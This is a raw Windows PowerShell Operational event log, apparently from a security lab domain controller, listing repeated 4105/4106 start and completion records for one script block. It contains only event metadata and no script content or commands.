Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467510
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467509
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467508
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467507
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467506
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467505
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467504
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467503
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467502
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467501
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467500
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467499
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467498
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467497
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467496
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467495
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467494
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467493
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467492
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467491
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467490
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467489
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467488
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467487
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467486
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467485
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467484
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467483
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467482
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467481
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467480
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467479
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467478
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467477
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467476
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467475
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467474
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467473
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467472
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467471
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467470
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467469
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467468
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467467
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467466
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467465
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467464
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467463
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467462
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467461
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467460
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467459
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467458
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467457
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467456
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
